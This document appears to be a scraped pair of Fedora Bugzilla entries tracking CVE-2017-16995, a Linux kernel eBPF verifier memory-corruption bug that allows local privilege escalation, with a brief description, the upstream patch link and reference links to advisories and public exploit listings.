CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution [fedora-all]
bugzilla · 2017-12-22 · CVSS 7.8 · CVE-2017-16995 [HIGH]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: thi
Bugzilla
CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
bugzilla · 2017-12-22 · CVSS 7.8 · CVE-2017-16995 [HIGH]
Linux kernel built with the eBPF bpf(2) system call (CONFIG_BPF_SYSCALL) support
is vulnerable to an arbitrary memory read/write issue. It can occur when a user supplies a malicious BPF program that causes calculation errors in the eBPF verifier module.
An unprivileged user could use this flaw to escalate their privileges on a system.
Upstream patch
-> https://git.kernel.org/linus/3db9128fcf02dcaafa3860a69a8a55d5529b6e30
References:
-> http://seclists.org/oss-sec/2017/q4/429
-> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16995
-> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995
-> https://bugs.chromium.org/p/project-zero/issues/detail?id=1454
Mitigation:
#
References:
- http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f
- https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f
- https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=a6132276ab5dcc38b3299082efeb25b948263adb
- http://openwall.com/lists/oss-security/2017/12/21/2
- http://www.securityfocus.com/bid/102288
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1454
- https://usn.ubuntu.com/3619-1/
- https://usn.ubuntu.com/3619-2/
- https://usn.ubuntu.com/3633-1/
- https://usn.ubuntu.com/usn/usn-3523-2/
- https://www.debian.org/security/2017/dsa-4073
- https://www.exploit-db.com/exploits/44298/
- https://www.exploit-db.com/exploits/45010/
- https://www.exploit-db.com/exploits/45058/
Published 2017-12-27